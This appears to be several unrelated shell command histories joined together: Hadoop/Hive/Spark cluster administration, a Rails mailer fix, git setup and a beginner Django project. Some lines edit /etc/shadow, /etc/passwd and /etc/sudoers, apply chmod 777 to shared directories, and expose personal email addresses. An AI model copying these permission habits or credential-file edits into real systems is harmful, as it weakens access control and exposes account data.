/etc/security/limits.conf +ulimit -s unlimited +free -m +su root +ls +mkdir iotmp +ls +chmod 777 iotmp/ +ll +ll +sudo chmod 766 iotmp/ +ls +ll +ls +ll +su root +ls +sudo chmod 777 iotmp/ +su root +hive +su root +hadoop fs -chmod -R 777 /tmp +su root +ll +sudo chmod 666 iotmp/ +ll +ll +hive +sudo chmod 776 iotmp/ +hive +su root +top +hive +ls +hive +top +ls +mahout +mahout testforest +top +free -m +top +ls +ls +cp /home/air1/hjq/weather_all_formatted_complete.csv /home/air/wgb/weatherdata/rawweatherdata.csv +sudo cp /home/air1/hjq/weather_all_formatted_complete.csv /home/air/wgb/weatherdata/rawweatherdata.csv +su air1 +mysql -uroot -p +find / -name echo.txt +ls +ls +su air +R +ls +ls +ll +locate randomForest +ls +ls +ls +ls +su root +R +ls +pwd +ls +top +su root +hadoop fs -ls /tmp +hadoop fs -ls /tmp/hive +hadoop fs -ls /tmp/hive/air +hadoop fs -ls /tmp/hive/air/3d* +hadoop fs -ls /tmp/hive/mobile +hadoop fs -ls /tmp/hive/ +hadoop fs -ls /tmp/hive/mobile +hive +rz +ls +pwd +vim wenyi.csv +rz +ls +pwd +mahout buildforest --data /home/dmc --dataset train0120.csv --nbtrees 10 --output /home/dmc/mahout_file2 +su root +su root +ls +jps +ls +dfs -ls /user/hive/warehouse +hadoop dfs -ls /user/hive/warehouse +hadoop dfs -ls /user/hive/warehouse/airdata/ +hadoop dfs -ls /user/hive/warehouse/airdata.db +hadoop dfs -ls /user/hive/warehouse/airdata.db/wenyi +hadoop dfs -ls /user/hive/warehouse/airdata.db/wenyi/wenyi.csv +hadoop dfs -cat /user/hive/warehouse/airdata.db/wenyi/wenyi.csv +hive +hivehive +ckear +clear +hive +hadoop fs -ls /user/hive/ +hadoop fs -ls /user/hive/warehouse +hadoop fs -ls /user/hive/warehouse/airdata.db +ls +hive +hive +ls +rm tmp.txt +ls +sz wenyi.csv +mkdir tmp +ls +rz +vim wenyi.csv +ls +vim wenyi.csv +ls +pwd +ls +rm wenyi.csv +ls +rz +vim wenyi.csv +hive +ls +vim wenyi.csv +vim tmp/ +ls +vim wenyi.csv +pw +pwd +ls +ls +rm train0120.csv +ls +vim wenyi.csv +hive +hive -S -e "select * from airdata.wenyitable limit 10;" > tmp.txt +ls +ls -l +vim tmp.txt +echo $LANG +sudo vi /etc/sysconfig/i18n +sudo vim /etc/sysconfig/i18n +ls +top +su root +ls +sudo rm -r wenyi.csv +ls +rz +ls +pwd +cat wenyi.csv +head wenyi.csv +clearec +echo ï¿¥LANG +echo $LLANG +echo $LANG +hive +su root +ls +top +sudo vim shadow +groups +touch ss.txt +touch ss +top +vim /etc/group +ls +vim /etc/passwd +ls +useradd +sudo useradd -d /home/wanggaobin -s /bin/bash -m wanggaobin +sudo passwd wanggaobin +ls +ls +ls +ls r* +ls +sudo cd root/ +sudo cd root/ +sudo -cd root/ +sudo ls root/ + +ls +ls +sudo vim /etc/group +ls +ls +sudo vim passwd +sudo vim group +echo $PATH +ls +ls -l +group +groups +su wanggaobin +hadoop +hadoop fs -ls +hadoop +ls +ls +su wanggaobin +ls +vim /etc/sudoers +sudo vim /etc/sudoers +hadoop +sudo vim /etc/group +sudo vim /etc/passwd +sudo vim /etc/group +ls +ls +ll +ll +ll +ls +df -h +ls +ls +ll +ls +ls +su root +top +sudo /mnt +ls +ls +ls +ls +ll +du -sh +df -h +ls +ls +sudo vim hive-site.xml +hive +su root +ls +ls +sudo vim hive-site.xml +top +hive +ntpdate asia.pool.ntp.org +sudo ntpdate asia.pool.ntp.org +ls +ls +sudo vim hive-site.xml +start-all.sh +ssh new007 +ssh new001 +stop-all.sh +start-all.sh +jps +start-all.sh +hive +hive +ls +ls +ls +tar -zxvf apache-hive-1.0.1-bin.tar.gz +ls +;s +ls +ls +sudo vim hive-default.xml.template +hive +ls +mkdir iotmp +ls +hive +ls +sudo vim hive-site.xml +ls +ls +sudo vim mapred-site.xml +sudo vim core-site.xml +ll +ls +cat mapred-site.xml +ls +ls +ll +sudo chmod 777 tmp +ls +ls +sudo mkdir iotmp +ls +sudo chmod 777 iotmp/ +ls +route add default gw +ping +ping +service network restart +ping www.baidu.com +clear +start-all.sh +hadoop fs -ls / +hive +top +++++++++++++++++++++++ +top +z +start-all.sh +ls +ll +ls +top +~~~~ +quot +df -h +df -h +free -m +df -h +ls +mkdir data +sudo mkdir data +ls +sudo mount /dev/sda1 /mnt/data +ls +fdisk -l +fdisk -l /more/proc/partions +sudo mount /dev/sdc /mnt/data +df -h +sudo mount /dev/sde /mnt/data +free -m +df -h +df -h +sudo mount /dev/sde5 /mnt/data +sudo /mnt/data +mnt/data +fdisk -l +ubuntu +sudo fdisk -l +sudo mount /dev/sde1 /mnt/data +ls +ls +ls +ls +ls +sudo cp -r project /mnt/data +ls +ls +du -sh +sudo umount /mnt/data +clear +[B[B[B[B +clear +handoop +hadoop fs -ls / +top +` + + + +''' + + +ls +sudo apt-get update +ping www.baidu.com +sudo route add default gw +ping www.baidu.com +ifconfig +netstat -n +reboot now +sudo reboot now +ls +sudo adduser bike +su bike +ls +lastlog +userdel -r ruc15 +sudo userdel -r ruc15 +top +userdel -r air1 +lastlog +sudo userdel -r mobile1 +lastlog +sudo userdel -r mobile2 +sudo userdel -r mobile3 +sudo userdel -r mobile4 +lastlog +sudo userdel -r air1 +sudo userdel -r air2 +sudo userdel -r air3 +sudo userdel -r air4 +lastlog +sudo adduser -r ruc15 +sudo useradd -r ruc15 +lastlog +userdel -r ruc15 +sudo userdel -r ruc15 +sudo useradd -m ruc15 +sudo userdel ruc15 +ls +lastlog +sudo adduser ruc15 +groups +groups air +sudo usermod -a -G hadoop bike +groups bike +su bike +ls +pwd +ls -l +ls +ls -l +mkdir bicycledata +ls -l +chmod 777 bicycledata/ +ls -l +pwd +ls +pwd +ls +ls -l +pwd +ls +mkdir trandata +mv ./*.csv ./trandata/ +ls +ls +ls -l +ls +mkdir sxjdata +ls +ls +sudo rz +ls +ls +ls +bicycledata/ +ls +ls +mv ./*.csv ./sxjdata/ +ls +ls +ls -l +ls +ls -l +chmod 741 bicycledata/ +ls -l +chmod 774 bicycledata/ +ls -l +chmod 754 bicycledata/ +ls -l +chmod -R 754 bicycledata/ +sudo chmod -R 754 bicycledata +ls -l +ls +ls -l +ls +pwd +ls +ls +mkdir files +ls +sudo rz +ls +sudo rz +ls +sudo rz +ls +ls +vim readme.txt +ls +ls -l +cat readme.txt +ls +ls +ls +ls +ls +ls -l +ls +ls +pwd +ls +pwd +ls +ls -l +ls +ls +ls +mkdir weatherdata +ls -l +ls +sudo rz +ls +head weatherdata_hz.csv +ls -l +ls +ls +ls +sudo rm -r exercise/ +ls +rm -r timezone_test/ +sudo rm -r timezone_test/ +ls +sudo rm -r standalone/ +l +sudo rm -r weatherdata/ +ls +gz +rz +sz +ls +sudo rm -r py +ssh dmc002 +ls +cat slaves +cat hostname +cat hosts +ssh new001 +ls +sudo chmod 777 wgb +ls +sudo mv wgb py +ls +ls +ll +rm -r +sudo rm -r airdata +ls +ls +sudo rm -r airdata_temp/ +ls +sudo rm -r output/ +ls +sudo rm -r cluster/ +ls +cat l.R +cat weather.R +su root +lastlog +ls +csd + + + + + + + + +ls +mkdir iotmp +ls +sudo chmod 774 iotmp +ls +ll +su root +sudo route add default gw +ping www.baidu.com +jps +start-all.sh +hive +hadoop fs -ls +hadoop fs -ls / +hive +su air +su root +lastlog +top +exit +lastlog +sudo useradd lvxiaoling +lastlog +sudo userdel lvxiaoling +sudo adduser lvxiaoling +sudo gpasswd -a lvxiaoling hadoop +su lvxiaoling +sudo apt-get install pyspark.milib.recommendation +spark +su root +scala +spark version +hadoop version +LASTLOG +lastlog +rz +ls +sudo userdel ruc15 +latlog +lastlog +sudo userdel ruc15 +lastlog +sudo userdel ruc15 +sudo userdel ruc15 +lastlog +sudo adduser ruc15 +su ruc15 +ls +ls +ls +cat /etc/profile +ls +sudo tar zxvf spark-1.6.0-bin-hadoop2.6.tgz +ls +sudo vim /etc/profile +source /etc/profile +ls +ls +ls +cp spark-env.sh.template spark-env.sh +sudo cp spark-env.sh.template spark-env.sh +cp spark-env.sh.template spark-env.sh +sudo vim spark-env.sh +sudo cp slaves.template slaves +sudo vim slaves +ls +./start-all.sh +ls +ls +ls +start-all.sh +pyspark +spark-shell +ls +ls +ls +ls +cat /etc/profile +ls +ls +cat spark- +cat spark-env.sh +cat slaves +sudo vim readme.txt +ls +sudo chown -R -v ruc15:hadoop /home/ruc15 +su ruc15 +rz +ls +ll +sudo tar zxvf spark-1.6.0-bin-hadoop2.4.tgz +sudo vim /etc/profile +ls +ls +sudo cp -r spark-env.sh /home/dmc/file/spark-1.6.0-bin-hadoop2.4/conf/ +sudo cp -r slaves /home/dmc/file/spark-1.6.0-bin-hadoop2.4/conf/ +ls +cat slaves +cat spark-env.sh +ls +ls +stop-all.sh +start-all.sh +pyspark +file +ls +sudo rm -r spark-1.6.0-bin-hadoop2.6 +ls +ls +cp file/spark-1.6.0-bin-hadoop2.4.tgz software/ +ll +ls +sudo rm -r spark-1.6.0-bin-hadoop2.4.tgz +sudo rm -r spark-1.6.0-bin-hadoop2.6.tgz +ls +start-all.sh +/home/dmc/file/spark-1.6.0-bin-hadoop2.6/bin/pyspark recspark.py +ls +ls +ls +/home/dmc/file/spark-1.6.0-bin-hadoop2.6/bin/pyspark recspark.py +ls +/home/dmc/file/spark-1.6.0-bin-hadoop2.4/bin/pyspark recspark.py +start-all.sh +su root +lastlog +su bike +jps +ssh nsrc@ +logout +ifconfig +cat /etc/hosts +ifconfig +ssh new010 +java -version +echo $JAVA_HOME +ls +ls +ll +ifconfig +netstat -rn +cat /etc/network/interfaces +sz hadoop_old/ +**01000000039a32Š +sz hadoop_old +**01000000039a32Š +sudo chmod 777 hadoop_old +ls +sz hadoop_old/ +**01000000039a32Š +sz hadoop_old +**01000000039a32Š +ls +ll +sz etc +**01000000039a32Š +ls +chmod 777 etc +sudo chmod 777 etc +ls +sz etc +**01000000039a32Š +ls +ls +sz core-site.xml +sz hdfs-site.xml +sz mapred- +sz mapred-site.xml +sz yarn-site.xml +cat slaves +cat /etc/profile +sudo scp /etc/profile / +ls +sudo scp /etc/profile /home/nsrc +ls +sudo scp /etc/profile /home/dmc +ls +ls +sudo rm -r profile +ls +ls +sudo rm -r nsrc +ls +ls +ls +ls +ls +ls +ssh new001 +ls +ls +java -version +sz +sz jdk-7u79-linux-x64.gz +sz jdk-7u45-linux-x64.tar.gz +ls +ls +cat core-site.xml +sz hadoop +**01000000039a32Š +sudo cp hadoop/ hadoop_old +ls + +sudo cp hadoop hadoop_old +sudo cp -r hadoop hadoop_old +ls +start-all.sh +jps +R +LASTLOG +lastlog +ls +sudo rm -r hadoop +hadoop fs -ls / +ls +sudo hadoop_odl +sudo scp -r hadoop_old hadoop +ls +start-all.sh +jps +ls +ll +sudo chown dmc:hadoop hadoop +ll +ll +sudo chown dmc:hadoop hadoopcd +sudo chown -R dmc:hadoop hadoop +LL +ll +ls +ll +start-all.sh +jps +hive +ll +sudo chown -R dmc:hadoop /tmp/hive +hive +hdfs dfsadmin -safemode leave +hive +echo $HIVE_HOME +sudo scp -R hive hive_old +sudo scp -r hive hive_old +ls +sudo scp -r hive hive_old +ls +sz hive_old +**01000000039a32Š +ls +echo $SPARK_HOME +ls +ls +sz spark-env.sh +cat slaves +ls +ls +ls +hive +ls +sudo mkdir iotmp +sudo rm -r iotmp +ls +sudo mkdir iotmp +hive +java +java -version +hive +ls +ll +whereis upload +locate upload +hive +ls +sudo chown 776 iotmp/ +ll +sudo chown -R dmc:hadoop iotmp +hive +su root +ls +ls +ll +sudo chmod 764 iotmp +hive +ll +sudo chmod 774 iotmp +sudo gpasswd -a wanggaobin hadoop +su root +su root +ls +mkdir iotmp +ll +sudo chown 666 iotmp +hive +sudo chown 776 iotmp +hive +ls +sudo cd /home/wanggaobin +/home/wanggaobin/code/ProjectBicycle/QueryData +hive -f /home/wanggaobin/code/ProjectBicycle/QueryData/gif1.hql > /home/wanggaobin/code/ProjectBicycle/EDA/gif1.txt +sudo hive -f /home/wanggaobin/code/ProjectBicycle/QueryData/gif1.hql > /home/wanggaobin/code/ProjectBicycle/EDA/gif1.txt +sudo hive -f /home/wanggaobin/code/ProjectBicycle/QueryData/gif1.hql > result.txt +hive -f /home/wanggaobin/code/ProjectBicycle/QueryData/gif1.hql > result.txt +sudo cp /home/wanggaobin/code/ProjectBicycle/QueryData/gif1.hql hqlq.hql +ls +vim result.txt +ls +hive -f hqlq.hql > result.txt +vim hqlq.hql +sudo vim hqlq.hql +hive -f hqlq.hql > result.txt +sudo vim hqlq.hql +hive -f hqlq.hql > result.txt +ls +wc result.txt +head result.txt +sudo sz result.txt +ls +cat hqlq.hql +hvie +hive +ls +touch hql2.hql +vim hql2.hql +sudo vim hql2.hql +hive -f hql2.hql +sudo vim hql2.hql +hive -f hql2.hql +sudo vim hql2.hql +ls +ls -al +start-all.sh +jps +echo $HADOOP_HOME +ls +ls +cat core-site.xml +ls +ls +sudo mv tmp/ +sudo mv tmp tmp_old +mkdir tmp +ll +start-all.sh +jps +stop-all.sh +999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999 +jps +start-all.sh +jps +ls +sudo scp -r /home/dmc/hadoop_old/tmp/ /home/dmc/hadoop +ls +ls +ll +sudo chown -R dmc:hadoop /home/dmc/hadoop/tmp +ll +stop-all.sh +start-all.sh +jps +hadoop fs -ls / +hive +ls +mkdir iotmp +ls +ls +ll +ll +mkdir iotmp +jps +hive +hadoop dfsadmin -safemode leave +hive +sudo su +exit +ls +ls +exit +ls +tar -czf mcbisite/ +man tar +tar -czf mcbisite/ mcbisite.tar.gz +ls +scp -r mcbisite/ . +ping +ls +claer +clear +pwd +ls +quit +exit +ls +tail -f /etc/php_errors.log +tail -f /etc/php_erros.log +tail -f /etc/php_error.log +tail -f /etc/php_errors.log +unset DYLD_LIBRARY_PATH ; unset LD_LIBRARY_PATH +mkdir -p ~/.boot2docker +if [ ! -f ~/.boot2docker/boot2docker.iso ]; then cp /usr/local/share/boot2docker/boot2docker.iso ~/.boot2docker/ ; fi +/usr/local/bin/boot2docker init +/usr/local/bin/boot2docker up +$(/usr/local/bin/boot2docker shellinit) +docker version +git add +git add -A +git commit -m "I think I'm all done now :)" +git push origin master +git remote add origin git@github.com:0lumide/WindowsPhonePractice.git +ls +mkdir de +git init +ls +git remote add origin git@github.com:0lumide/WindowsPhonePractice.git +ls +touch README.md +git add -A +git commit -m "Test" +git push origin master +ls +ls +rm de/* +ls +rmdir de +rm -r de/ +y +rmdir de +ls +mkdir WindowsPhonePractice +git init +git remote add origin git@github.com:0lumide/WindowsPhonePractice.git +git pull +ls +touch hello.txt +git add -A +git push origin master +git commit -m "test agani" +git push origin master +git pull +git pull origin master +git push origin master +git pull +git pull +git +git pull +ls +ls -alrth +ls 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app_production > infile +vim infile +rails generate mailer UserMailer +vim app/mailers/user_mailer.rb +vim app/mailers/application_mailer.rb +vim app/mailers/application_mailer.rb +vim app/mailers/user_mailer.rb +sudo service unicorn restart +vim /var/log/unicorn/unicorn.log +sudo service unicorn restart +vim /var/log/unicorn/unicorn.log +vim app/views/contact/index.html.slim +vim /var/log/unicorn/unicorn.log +sudo service unicorn restart +vim /var/log/unicorn/unicorn.log +vim app/mailers/user_mailer.rb +sudo service unicorn restart +vim /var/log/unicorn/unicorn.log +vim app/views/contact/index.html.slim +sudo service unicorn restart +vim app/controllers/contact_controller.rb +sudo service unicorn restart +vim app/controllers/contact_controller.rb +sudo service unicorn restart +vim /var/log/unicorn/unicorn.log +vim /var/log/unicorn/unicorn.log +vim app/controllers/contact_controller.rb +sudo service unicorn restart +vim /var/log/unicorn/unicorn.log +vim /var/log/unicorn/unicorn.log +vim /var/log/unicorn/unicorn.log +mv app/views/user_mailer/send_email.html.erb app/views/user_mailer/send_mail.html.erb +sudo service unicorn restart +vim /var/log/unicorn/unicorn.log +vim /var/log/unicorn/unicorn.log +vim /var/log/unicorn/unicorn.log +vim app/mailers/application_mailer.rb +sudo service unicorn restart +vim /var/log/unicorn/unicorn.log +sudo apt-get update && sudo apt-get -y upgrade && sudo apt-get -y dist-upgrade && sudo apt-get -y autoremove +sudo apt-get -y install exim4 +sudo dpkg-reconfigure exim4-config +sudo apt-get install sendmail +sudo apt-get install sendmail +sudo apt-get install sendmail +sudo apt-get install sendmail +sudo apt-get install sendmail +sudo apt-get update && sudo apt-get -y upgrade && sudo apt-get -y dist-upgrade && sudo apt-get -y autoremove +sudo apt-get install sendmail +sudo apt-get remove exim4 +sudo apt-get install sendmail +nano /etc/hosts +sudo sendmailconfig +time echo testmail | sendmail zaali@live.com +vim /var/log/unicorn/unicorn.log +vim /var/log/unicorn/unicorn.log +create mode 100644 app/views/user_mailer/send_mail.html.erb +mv app/views/user_mailer/send_mail.html.erb app/views/user_mailer/send_mail.text.erb +sudo service unicorn restart +vim /var/log/unicorn/unicorn.log +vim /var/log/unicorn/unicorn.log +vim /var/log/unicorn/unicorn.log +vim app/controllers/contact_controller.rb +sudo service unicorn restart +mv app/views/user_mailer/send_mail.text.erb app/views/user_mailer/send_mail.html.erb +sudo service unicorn restart +vim app/views/user_mailer/send_mail.html.erb +sudo service unicorn restart +vim app/mailers/user_mailer.rb +vim app/mailers/application_mailer.rb +sudo service unicorn restart +ls +psql +vim app/views/pricing/index.html.slim +sudo service unicorn restart +vim public/css/style.css +vim app/views/home/index.html.slim +sudo service unicorn restart +vim public/css/style.css +vim app/views/how/index.html.slim +sudo service unicorn restart +vim app/views/layouts/application.html.slim +vim app/views/term/index.html.slim +sudo service unicorn restart +vim app/mailers/application_mailer.rb +vim app/mailers/user_mailer.rb +sudo service unicorn restart +vim app/mailers/user_mailer.rb +vim app/assets/javascripts/map.js +sudo service unicorn restart +vim app/assets/javascripts/map.js +sudo service unicorn restart +rake assets:precompile +rake assets:precompile --trace +sudo service unicorn restart +vim app/assets/javascripts/map.js +sudo service unicorn restart +rake assets:precompile --trace +sudo service unicorn restart +vim app/assets/javascripts/map.js +rake assets:precompile --trace +sudo service unicorn restart +vim app/assets/javascripts/map.js +rake assets:precompile --trace +clear +sudo service unicorn restart +vim app/assets/javascripts/map.js +rake assets:precompile --trace +sudo service unicorn restart +vim app/assets/javascripts/map.js +rake assets:precompile --trace +sudo service unicorn restart +vim app/assets/javascripts/map.js +rake assets:precompile --trace +sudo service unicorn restart +vim app/assets/javascripts/map.js +rake assets:precompile --trace +sudo service unicorn restart +vim app/assets/javascripts/map.js +rake assets:precompile --trace +sudo service unicorn restart +vim app/assets/javascripts/map.js +rake assets:precompile --trace +sudo service unicorn restart +vim app/assets/javascripts/map.js +rake assets:precompile --trace +sudo service unicorn restart +vim app/assets/javascripts/map.js +rake assets:precompile --trace +sudo service unicorn restart +ls public/ +mv public/index.html public/construction.html +exit +vim app/views/layouts/application.html.slim +sudo service unicorn restart +vim app/views/pricing/index.html.slim +sudo service unicorn restart +exit +vim app/views/map/index.html.slim +sudo service unicorn restart +vim app/views/layouts/application.html.slim +sudo service unicorn restart +exit +git add . +git commit -m 'qweqew' +git push origin master +git status +git add . +git add -A +sudo git add . +sudo git add -A +sudo git commit -m 'latest' +sudo git push origin master +vim app/mailers/user_mailer.rb +vim app/mailers/application_mailer.rb +sudo service unicorn restart +vim app/views/pricing/index.html.slim +sudo service unicorn restart +vim app/views/pricing/index.html.slim +sudo service unicorn restart +vim app/views/pricing/index.html.slim +sudo service unicorn restart +vim app/views/pricing/index.html.slim +sudo service unicorn restart +exi +exit +uname -a +passwd +ls +vi .forward +edalias +passwd sexysw +ls +ls +nugu -e sexysw +nugu -s potato +nugu -l | grep 15 +nugu -e sexysw +edalias +ls +ls +ls +mkdir project_test +virtualenv project_test/ +source activate project_test/ +source activate projecct_test +ls +source project_test/bin/activate +ls +source project_test/bin/inactivate +source inactivate +source deactivate +ls +ls +ls +ls +ls +ls +ls +ls +deactivate +ls +activate +./project_test/bin/activate +ls +ls +source /project_test/bin/activate +source ~/project_test/bin/activate +ls +git +git remote +git remote addsalsw1996 +git add +git init +git remote addsalsw1996/SPARCS_Newbie_proj1.git +git remote +git remote -v +git remote add origin +git remote add originsalsw1996/SPARCS_Newbie_proj1.git +git remote +pip freeze +ls +~/project_test/bin/pip freeze > requirements.txt +vim requirements.txt +pip freeze -r +ls +vim pip-selfcheck.json +rm pip-selfcheck.json +ls +vim requirements.txt +vun requirements.txt +vim requirements.txt +pip install Django=1.10.3 +pip install Django==1.10.3 +ls +ls +ls +ls +ls +ls +ls +django-admin startproject Hello_World +ls +ls +python manage.py runserver 10000 +ls +python manage.py startapp Hello +ls +ls +emacs polls/views.p +emacs polls/views.py +emacs Hello/views.py +vim Hello/views.py +ls +ls +vim Hello/urls.py +pip show jinja +pip show Jinja2 +vim Hello/views.py +vim Hello/urls.py +vim Hello/views.py +vim Hello/urls.py +ls +vim manage.py +python manage.py runserver 10000 +python manage.py runserver 0...0.0.0:10000 +python manage.py runserver +python manage.py runserver 0.10000 +python manage.py runserver 010000 +python manage.py runserver 20000 +vim manage.py +ls +ls +deactivate +ls +ls +ls +rm -r Hello_World/ +ls +rm -r project_test/ +virtualenv env +export swenv=~/env/bin/activate +source swenv +swenv +source env/bin/activate +pip install Django==1.19.3 +pip install Django==1.10.3 +django-admin startproject Hello +ls +vim manage.py +python manage.py migrate +python manage.py runserver 10000 +python manage.py runserver 50568 +python manage.py migrate +python manage.py +python manage.py runserver +python manage.py migrate +python manage.py runserver +python manage.py runserver +python manage.py runserver +ls +deactivate +ls +ls +rm -r env +rm -r Hello/ +ls +exit +ls +virtualenv env +ls +export ACT=~/env/bin/activate +source A +source ACT +echo $ACT +source $ACT +deactivate +export act=~/env/bin/activate +source $act +ls +pip install Django==1.10.3 +ls +ls +django-admin startproject Hello +pip install django +django-admin startproject Hello +ls +ls +ls +django-admin startproject sexysw +pip +pip uninstall django +pip install --upgrade pip +pip install django +pip install Django==1.10.3 +deactivvate +deactivate +ls +rm -r env +virtualenv env +source $act +ls +pip install django +django-admin startproject Hello +django-admin startproject hello +ls +django-admin startproject hello +django -v +deactivate +source env/bin/activate +ls +ls +django-admin activate +django-admin startproject hello +ls +ls +ls +deactivate +rm -r env +virtualenv environ +source environ/bin/activate +pip install django +django-admin startproject Hello +ls +ls +django-admin startproject sexysw +deactivate +ls +rm -r environ +virtualenv environ +virtualenv -p /usr/bin/python2.7 environ +ls +ls +export act=~/environ/bin/activate +source $act +ls +pip install django +django-admin startprojcet hello +django-admin startproject hello +ls +python manage.py runserver 10123 +python manage.py migrate +python manage.py runserver 10123 +python manage.py runserver +python manage.py runserver +ls +ls +vim settings.py +python manage.py runserver +python manage.py runserver +vim hello/settings.py +ls +python manage.py startapp print_hello +vim hello/settings.py +python manage.py runserver +python manage.py startapp print_hello +ls +rm -r print_hello/ +ls +ls +python manage.py startapp print_hellp +mv print_hellp print_hello +ls +rm -r print_hello/ +python manage.py startapp print_hello +vim hello/settings.py +vim print_hello/views.py +vim print_hello/urls.py +ls +ls +ls +vim urls.py +python manage.py runserver +ls +vim manage.py +rm -r print_hello +ls +python manage.py startapp helloworld +ls +python manage.py startapp helloworld +vim manage.py +vim hello/ +vim hello/settings.py +python manage.py startapp helloworld +vim hello/settings.py +vim helloworld/views.py +ls +vim urls.py +python manage.py runserver +python manage.py migrate +vim hello/views.py +ls +ls +ls +vim helloworld/views.py +vim helloworld/urls.py +vim helloworld/views.py +vim helloworld/urls.py +vim helloworld/views.py +vim helloworld/urls.py +vim hello/urls.py +python manage.py runserver +vim hello/urls.py +python manage.py runserver +vim hello/urls.py +vim helloworld/urls.py +vim helloworld/views.py +python manage.py runserver +vim helloworld/urls.py +python manage.py runserver +vim helloworld/views.py +python manage.py runserver +vim helloworld/urls.py +python manage.py runserver +vim helloworld/urls.py +vim hello/urls.py +python manage.py runserver +ls +ls +ls +git init +git config --global user.name "sexysw" +git config global user.email "ksalsw1996@kaist.ac.kr" +git config --global user.email "ksalsw1996@kaist.ac.kr" +git status +git branch +git add . +git commit +git remote add origin +environ hello +(environ)sexysw@bit:~$ git init +Initialized empty Git repository in /home/sexysw/.git/ +(environ)sexysw@bit:~$ git config --global user.name "sexysw" +(environ)sexysw@bit:~$ git config global user.email "ksalsw1996@kaist.ac.kr" +error: key does not contain a section: global +(environ)sexysw@bit:~$ git config --global user.email "ksalsw1996@kaist.ac.kr" +(environ)sexysw@bit:~$ git status +# On branch master +# +# Initial commit +git branch +git remote +git remote add originsalsw1996/SPARCS_Newbie_proj1.git +git remote +git push origin +git push +git push origin master +git config +.git ignore environ/ +git ignore environ +git reset --hard HEAD^ +git reset --hard HEAD~1 +git reset --hard HEAD +git status +vim .gitignore +ls +git add . +git add hello +git commit +git checkout +vim .gitignore +git add +git add . +git commit +git push +git reset HEAD^ +git rm --cached -r environ +ls +git add . +git commit +git push +git -f push +git push origin master --force +exit +ls +ls +ls +ls +vim urls.py +vim views.py +ls +vim settings.py +ls +ls +mkdir templates +vim main.html +ls +vim urls.py +ls +vim settings.py +vim urls.py +ls +ls +vim views.py +ls +python manage.py runserver +ls +vim models.py +python manage.py check +exit +ls +ls +vim templates/ +ls +ls +vim urls.py +vim views.py +python manage.py runserver +ls +vim main.html +vim urls.py +vim views.py +vim ../hello/settings.py +ls +vim templates +ls -al +python manage.py migrate +python manage.py runserver +ls +python manage.py runserver +vim hello/settings.py + +python manage.py runserver +vim hello/settings.py +python manage.py runserver +vim hello/settings.py +vim hello/urls.py +vim helloworld/views.py +ls +vim main.html +ls -al +ls +source activate environ/bin/activate +source environ/bin/activate +python manage.py runserver +vim hello/urls.py +vim helloworld/views.py +vim hello/settings.py +vim helloworld/views.py +ls +vim urls.py +vim views.py +vim models.py +vim tests.py +ls +vim urls.py +vim settings.py +python manage.py runserver +vim hello/urls.py +python manage.py runserver +vim hello/urls.py +python manage.py runserver +vim hello/urls.py +python manage.py runserver +vim hello/urls.py +ls +vim helloworld/models.py +python manage.py check +python manage.py makemigrations +python manage.py migrate +python manage.py shell +python manage.py check +ls +vim helloworld/models.py +python manage.py shell[A +python manage.py shell +python manage.py check +python manage.py makemigrate +python manage.py makemigrations +python manage.py migrate +ls +exit +ls +source environ/bin/activate +ls +exit +vim main.css +ls +ls +ls +ls +emacs main.html +ls +vim main.css +ls +vim GanzapE.css +rm templates/main.html +vim templates/html/GanzapE.html +vim templates/html/main.html +vim templates/html/GanzapE.html +vim templates/html/mypage.html +vim templates/html/timetable.html +vim hello/urls.py +vim newbie/views.py +vim hello/urls.py +vim newbie/views.py +python manage.py runserver +vim templates/html/timetable.html +vim static/css/mypage.css +vim static/css/timetable.css +fg %1 +vim static/css/timetable.css +vim static/css/mypage.css +vim templates/html/GanzapE.html +vim newbie/views.py +vim hello/settings.py +vim hello/urls.py +vim newbie/views.py +exit +ls +ls +vim hello/urls.py +vim newbie/models.py +vim hello/settings.py +vim newbie/views.py +vim newbie/models.py +python manage.py check +vim newbie/models.py +source environ/bin/activate +source /environ/bin/activate +source ~/environ/bin/activate +python manage.py makemigrations +python manage.py migrate +ls +vi newbie/models.py +vim hello/settings.py +python manage.py shell +vi newbie/models.py +vim newbie/bi +vim newbie/views.py +python manage.py shell +python manage.py makemigrations +python manage.py migrate +vi newbie/models.py +vim newbie/views.py +python manage.py makemigrations +python manage.py makemigrations newbie +python manage.py migrate +vim manage.py runserver +source environ/bin/activate +vim templates/html/main.html +vim templates/html/mypage.html +vim templates/html/timetable.html +vim templates/html/pato.html +vim templates/html/GanzapE.html +vim templates/html/login.html +vim templates/html/main.html +vim templates/html/signup.html +vim templates/html/login.html +vim templates/html/GanzapE.html +vim templates/html/GanzapE.css +vim static/css/GanzapE.css +vim newbie/models.py +python manage.py makemigration newbie +python manage.py makemigrations newbie +vim static/css/GanzapE.css +vim newbie/models.py +python manage.py makemigrations newbie +vim newbie/models.py +python manage.py makemigrations newbie +vim newbie/models.py +python manage.py makemigrations newbie +vim newbie/models.py +python manage.py makemigrations newbie +vim newbie/models.py +python manage.py makemigrations newbie +vim newbie/models.py +python manage.py makemigrations newbie +vim newbie/models.py +python manage.py makemigrations newbie +vim newbie/models.py +python manage.py makemigrations newbie +vim newbie/models.py +python manage.py makemigrations newbie +vim newbie/models.py +vim newbie/views.py +python manage.py runserver +vim templates/html/timetable.html +python manage.py runserver +python manage.py shell +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim newbie/views.py +vim hello/urls.py +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim templates/html/timetable.html +exit +ls +source environ/bin/activate +vim newbie/models.py +python manage.py shell +vim newbie/views.py +python manage.py shell +exit +ls +ls +vim templates +ls +mkdir html +mkdir css +mkdir js +ls +python manage.py startapp newbie +ls +ls +ls +ls +vim settings.py +ls +ls +rm -r helloworld +python manage.py migrate +python manage.py check +ls +vim hello/settings.py +python manage.py check +python manage.py makemigrations +ls +source ~/environ/bin/activate +python manage.py check +ls +vim hello/urls.py +python manage.py check +vim hello/urls.py +python manage.py check +python manage.py makemigrations +python manage.py migrate +ls +ls +vim views.py +vim hello/urls.py +vim hello/urls.py +ls +vim hello/urls.py +vim newbie/views.py +vim hello/settings.py +python manage.py runserver +vim newbie/views.py +vim hello/settings.py +vim hello/urls.py +python manage.py runserver +vim hello/urls.py +vim newbie/views.py +vim hello/urls.py +python manage.py runserver +vim hello/urls.py +python manage.py runserver +vim newbie/views.py +python manage.py runserver +vim templates/html/main.html +python manage.py runserver +vim templates/html/main.html +python manage.py runserver +vim templates/html/main.html +vim hello/settings.py +python manage.py runserver +vim templates/css/main.css +vim hello/settings.py +vim templates/html/main.html 